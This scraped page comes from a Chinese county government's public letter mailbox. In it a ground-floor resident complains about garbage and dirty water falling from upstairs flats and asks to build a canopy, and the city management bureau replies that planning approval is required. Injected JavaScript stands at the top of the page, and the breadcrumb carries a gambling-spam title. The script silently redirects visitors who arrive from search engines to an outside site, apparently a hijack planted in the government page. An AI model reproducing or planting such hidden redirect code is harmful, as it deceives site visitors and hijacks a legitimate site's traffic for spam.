var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d06559e5a096e99dd4e26ec0cbfbf885"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href='http://www.fd699.com' }
收藏
您当前所在的位置:上海快三计划 >
政民互动 > 县长信箱

来信信息
信件编号: 10244409483142
来信标题: 关于老旧小区一楼带院子用户加盖阳台雨棚的建议........
来信时间: 2019-12-30
来信内容:
本人住在磙塘新村 一楼 常年 被楼上往下 扔垃圾 阳台防护网上直接把没有沥干的拖把 衣服挂在上面 水直接 滴落在我们进屋的过道上 头上, 把没有刷干净的鞋子, 鞋底全是泥巴, 直接放在阳台突出的防护网上 风一吹 泥巴就掉到一楼院子 和头上 ,冬天空调水哗啦啦的滴在自家院子里,上面养花养草 枯花 枯叶 枯枝 浇水 全部落在一楼院子里 ,你在下面喊破喉咙 没有人理会。 想盖个玻璃雨棚 档垃圾,防脏水, 二楼不同意 村里不同意 城管不让盖 请问 县里相关领导 我们该怎么办 今年我们省吃俭用赞了钱,买了一楼是为了给 2位岁老人住的,方便老是出行 ,前几天 我和二楼 商量 我问他 我们住在一楼 就活该要 吃亏吗?他的一番话真是雷人 他说 :你怎么不买二楼三楼四楼,我说二位老人都80多岁了爬不动 ,他说你不能卖带电梯的吗?我无语 。当初我们买一楼院子的时候一楼院子就开了大门 ,这么多年 为这个事情 找物业协调 村里协调 没有任何效果 反而 造成了 楼上楼下 成仇人 我们该不该 维权 这个事情这么解决 还希望 县长 大人,关心民生 重视一下,期待 党的春风,党的温暖“”“”“”“”
回复内容
答复单位: 庐江县城市管理局
办理时间: 2020-01-09
回复内容:


来信人:

您好!

您来信投诉的信件收悉,经我单位主要负责人批示,庐城镇城管大队执法人员前往现场调查了解,现将办理情况回复如下:

接到您的信件,我单位安排执法人员会同社区、小区物业进行调查了解,对您来信反映的家住一楼所带来的一些生活不便表示理解。但根据《中华人民共和国城乡规划法》的相关规定,您应先向当地规划部门申请办理取得相关审批手续后方可依法进行加建。对您来信投诉的其他问题,建议您向所在社区和物业部门进行反映。

感谢您对我们工作的关心和支持!


庐江县城市管理局

202018




留言评价
查询密码:
评价结果: